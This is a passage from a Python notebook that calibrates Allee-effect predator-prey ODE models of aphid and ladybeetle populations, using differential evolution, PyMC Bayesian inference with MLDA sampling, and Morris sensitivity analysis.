# Prior distributions for the model's parameters
r1_ = pm.Uniform(
"r1",
lower=(1.0 - percent_calibration) * r1,
upper=(1.0 + 20 * percent_calibration) * r1,
)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + 20 * percent_calibration) * r3,
)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# a1_ = pm.Data("a1", a1)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP1_model",
AP1_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_AP1:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_AP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
plt.hist(trace_calibration_AP1['r1'], bins=35)
plt.show()
# In[ ]:
calibration_variable_names = [
"std_deviation",
"r1",
"r3",
"a1", # included a1
]
# In[ ]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_AP1[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_AP1.png")
# In[ ]:
az.plot_pair(
trace_calibration_AP1,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_AP1.png")
# In[ ]:
df_stats_summary = az.summary(
data=trace_calibration_AP1,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[ ]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_AP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_AP1.csv") # salvando em um csv para consultas
df_stats_summary
# In[ ]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_AP1["AP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_AP1["AP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_AP1["AP1_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_AP1.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_AP1.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_AP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Allee Prey Growth FR2 model
# ## I can't reach a sinusoidal pattern for all calibrated parameters
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def AP2_model(
t,
X,
r1 = 1,
r2 = 1,
r3 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = ( r1 * u - r2 * u * u ) * ( r2 * u * u - r3 * u ) - a1 * u * v / ( a2 + a3 * u )
v_prime = 0
return u_prime, v_prime
def AP2_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
r2 = 1,
r3 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=AP2_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,r2,r3,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def AP2_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
seed = 1234
r1=0.11562168675891937
r2=9.074476369486926e-07
r3=0.0020683597238106855
a1=0.0019297724951409106
a2=0.8083006578721604
a3=2.95741489956641e-05
denom_min = 0.1
denom_max = 1.9
bounds_AP2 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
( ( r3 * denom_min ), ( r3 * denom_max ) ), # r3
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_AP2 = optimize.differential_evolution(
AP2_least_squares_error_ode,
bounds=bounds_AP2,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
AP2_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_AP2)
# * Retrieving the calibrated parameter values:
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
r3_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_AP2.x
solution_ODE_AP2 = AP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_AP2.x
)
t_computed_AP2, y_computed_AP2 = solution_ODE_AP2.t, solution_ODE_AP2.y
u_AP2, v_AP2 = y_computed_AP2
parameters_dict = {
"Model": "AP2",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$r3$": r3_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "r3=" + str(r3_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_AP2, u_AP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_AP2, v_AP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
r3,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = AP2_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
AP2_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_AP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
r3,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_AP2 = AP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_AP2.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_AP2.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_AP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[ ]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_AP2,
u_AP2,
v_AP2,
AP2_model,
mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_AP2, u_AP2, '-x', label='Pest population')
plt.plot(t_computed_AP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_AP2.png", dpi=300)
plt.show()
# In[ ]:
mean_values_params = [
r1,
r2,
r3,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_AP2 = AP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_AP2.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
AP2_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_AP2.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_AP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # r2
t.dscalar, # r3
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def AP2_ode_wrapper(time_exp, r1, r2, r3, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, r2, r3, a1, a2, a3]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
AP2_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[ ]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_AP2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
r2_ = pm.Uniform(
"r2",
lower=(1.0 - percent_calibration) * r2,
upper=(1.0 + percent_calibration) * r2,
)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + percent_calibration) * r3,
)
# a1_ = pm.Uniform(
# "a1",
# lower=(1.0 - percent_calibration) * a1,
# upper=(1.0 + percent_calibration) * a1,
# )
a1_ = pm.Data("a1", a1)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP2_model",
AP2_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
r2_ = pm.Uniform(
"r2",
lower=(1.0 - percent_calibration) * r2,
upper=(1.0 + percent_calibration) * r2,
)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + percent_calibration) * r3,
)
# a1_ = pm.Uniform(
# "a1",
# lower=(1.0 - percent_calibration) * a1,
# upper=(1.0 + percent_calibration) * a1,
# )
a1_ = pm.Data("a1", a1)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP2_model",
AP2_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
r2_ = pm.Uniform(
"r2",
lower=(1.0 - percent_calibration) * r2,
upper=(1.0 + percent_calibration) * r2,
)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + percent_calibration) * r3,
)
# a1_ = pm.Uniform(
# "a1",
# lower=(1.0 - percent_calibration) * a1,
# upper=(1.0 + percent_calibration) * a1,
# )
a1_ = pm.Data("a1", a1)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP2_model",
AP2_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_AP2:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_AP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
plt.hist(trace_calibration_AP2['r2'], bins=35)
plt.show()
# In[ ]:
calibration_variable_names = [
"std_deviation",
"r2",
"r3",
]
# In[ ]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_AP2[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_AP2.png")
# In[ ]:
az.plot_pair(
trace_calibration_AP2,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_AP2.png")
# In[ ]:
df_stats_summary = az.summary(
data=trace_calibration_AP2,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
